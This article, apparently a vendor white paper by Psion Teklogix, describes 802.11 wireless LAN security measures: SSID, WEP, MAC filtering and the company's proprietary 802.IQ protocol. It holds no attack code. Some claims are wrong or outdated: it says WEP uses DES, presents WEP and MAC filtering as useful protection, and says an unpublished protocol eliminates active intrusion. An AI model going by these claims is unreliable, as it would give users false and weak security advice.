Articles

RSS

The rising concern over security in Wireless LAN installation has caused Psion Teklogix to examine its own WLAN systems for present strengths and weaknesses and how to plan for increasing security in the future. Recent reports that attacks on 802.11 systems are possible have left potential customers and their IT groups nervous about implementing 802.11 for fear of leaving their networks and confidential information exposed. This report looks at the types of attacks that are possible, what exposure is possible through the WLAN and what can be done to secure a WLAN system.

Types of Attacks
Before examining the security measures, it may be useful to examine what can be exposed through the WLAN access point. Any LAN is vulnerable to two types of attacks, an active attack where the hacker gains access to the LAN and can destroy or alter data, or a passive attack where the hacker gains access to the LAN but can only eavesdrop on the data that is being transmitted over the LAN. Wireless LANs are more prone to both of these attacks since the hacker does not need to have a physical connection to the premises.

Access Point Functionality
An access point's function is to bridge data from the wired LAN to the WLAN. If it were to operate very simply, all the data from wired enterprise LAN would be broadcast over the Radio Frequency (RF) link. Most modern LANs however are more sophisticated, employing network switches to reduce the traffic on the wired LAN. The data is only passed through the switch if it destined for nodes on the opposite side, serving to reduce the network traffic but importantly leaving less data exposed to the connected device. Access points are usually connected to the LAN though a switch meaning there is minimal data for the access point to bridge. However, if the access point is not connected through the switch it acts in much the same way as the switch minimizing the data destined for the wireless LAN. Advanced access points keep bridging tables, with enough intelligence to know which wireless nodes are associated, or talking directly to it and bridging only the data destined for those nodes. This means that the only data that is exposed to RF eavesdroppers is the data that is passing back and forth from the mobile devices to network hosts.

The access point leaves minimal data to be exposed for WLAN eavesdroppers but still leaves the WLAN open for active attacks unless other measures are taken. Advanced access points however have several features built in to deter easy access to the WLAN.

Service Set Identification (SSID)
Service Set Identification was designed to allow wireless networks to be better managed or organized by keeping the wireless nodes talking to right system. Concurrent RF Networks could operate in the same physical area without getting mixed up by accessing the wrong network. Not intentionally designed to provide security, but by allowing access to only specific networks, SSID does provide a first level of security if the SSID is kept secret to those authorized to use the WLAN.

For a mobile client to gain access to a WLAN beyond eavesdropping, it must first 'associate' with the WLAN access point. The access point will grant the association to the mobile device if it's SSID matches that of the access point itself. The SSID is a parameter that must be programmed into both the access point and the client and provides a first level of defense from intruders. Although it has been proven that the SSID can be overcome it is a minimal line of defense that should be enabled to prevent unwanted users access to the WLAN.

Wired Equivalency Protocol (WEP)
WEP is intended to provide to provide security to the network by encrypting the data that is transmitted on the WLAN. WEP uses a known method of encryption called DES (Data Encryption Standard). The method used to encrypt the data is known but the idea is to use a key that is kept secret between the access points in the WLAN system and the mobile nodes. Some radio vendors employ two levels of encryption, with 40 bit or 128 bit keys to increase the difficulty of decoding the data. It was originally thought that the 128 bit encryption would be virtually impossible to break due to the large number of possible encryption keys. Hackers have been able to develop methods to break even 128 bit WEP without having to try each combination of key and so have proven that the system is not totally secure. These methods are based upon being able to gather enough packets off the network by eavesdropping to then determine the encryption key.

The WLAN industry has recognized that WEP is not as secure as once thought so is developing WEP2, using AES (Advance Encryption Algorithm) to make determining the encryption key more difficult. Although WEP can be broken, it will take considerable effort and expertise to break and so is still beneficial to enable WEP and rotate the keys on a frequent basis.

MAC Level Authentication
An effective method of preventing unwanted association to the WLAN is to use Medium Access Control (MAC) Level Authentication. In this method, the MAC address of the mobile client must be known to the access point before it will grant an association. Advanced access points allow administrators to build an internal table of MAC addresses of all the known clients that should have access to the WLAN. This effectively closes the system to only known mobile nodes.

Psion Teklogix 802.IQ System
Psion Teklogix has engineered an 802.11 system that improves performance for transactional based environments over TCP/IP. In other words, TCP/IP is replaced on the WLAN by the 802.IQ protocol. The published methods of breaking WEP depend on knowing the structure of the radio data packets and predicting them to be a TCP/IP packets. Using protocol filtering capabilities of an access point will allow all other protocols to be left off the WLAN except for 802.IQ packets, effectively closing the system to only PTX mobile computers. Even if the packets are decrypted, the structure of the 802.IQ packets are not published so the data remains PTX proprietary. Based on the 802.IQ architecture, the data on the wireless network passes only between the wireless network controller and the mobile node which severely reduces the amount of data that is exposed to eavesdropping and eliminates the possibility of an active intrusion. Eavesdropping on such things as SKU numbers and quantities when taken out of context, do not hold much value to a hacker.

Summary
All of the above methods operate independently, they can be used in combinations or used altogether to build more security into the wireless LAN and all are currently supported by Psion Teklogix wireless systems. As new methods of security are developed and become standardized, Psion Teklogix will evaluate and adopt any that improve the security of its own WLAN system. As an example there are movements to WEP2, to increase the difficulty of breaking the encryption. A totally new standard of security for wireless LANs is in the works called 802.11i which will introduce a new protocol for wireless security and Psion Teklogix is monitoring both of these closely. New and emerging standards will be very important in an industry where interoperability as well as security are two topics that drive development of new products.